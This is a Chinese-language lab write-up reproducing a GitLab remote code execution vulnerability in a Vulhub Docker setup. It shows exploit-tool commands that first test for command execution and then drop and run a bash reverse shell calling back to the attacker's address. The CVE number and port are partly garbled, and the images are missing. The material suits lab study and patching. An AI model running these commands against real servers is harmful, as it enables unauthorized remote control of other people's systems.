1 漏洞信息
2 环境搭建
2.1 环境概述
Linux操作系统(Vulhub)2.2 搭建过程
加入到漏洞目录下拉取漏洞
cd vulhub/gitlab/CVE--22205docker-compose up -d
{width=“5.761111111111111in”
height=“0.6458333333333334in”}
访问漏洞urlhttp://192.168.1.136:8080/users/sign_in
{width=“5.759722222222222in”
height=“2.2708333333333335in”}
3 漏洞复现
直接使用工具进行利用,下载地址/Al1ex/CVE--22205
CVE--22205.py -h
{width=“5.761805555555555in”
height=“3.7881944444444446in”}
验证下,发现存在漏洞
CVE--22205.py -t http://192.168.1.136:8080 -v true
{width=“5.756944444444445in”
height=“2.298611111111111in”}
创建目录,来判断是否能够执行命令
CVE--22205.py -t http://192.168.1.136:8080 -a true -c "touch /tmp/success--07"
{width=“5.761805555555555in”
height=“1.7493055555555554in”}
可以发现创建成功了
docker ps查看容器iddocker exec -it 84(容器id) /bin/bashcd /tmpls
{width=“5.761805555555555in”
height=“0.7847222222222222in”}
既然可以创建文件,那么我们可以创建执行反弹shell脚本、并且添加执行权限和运行该脚本的命令。
CVE--22205.py -t http://192.168.1.136:8080 -a true -c "echo 'bash -i >& /dev/tcp/192.168.1.1/ 0>&1' > /tmp/shell.sh && chmod +x /tmp/shell.sh && /bin/bash /tmp/shell.sh"
{width=“5.759722222222222in”
height=“1.5840277777777778in”}
成功反弹了shell
{width=“5.759027777777778in”
height=“1.5347222222222223in”}
4 修复建议
1、升级Gitlab至最新版本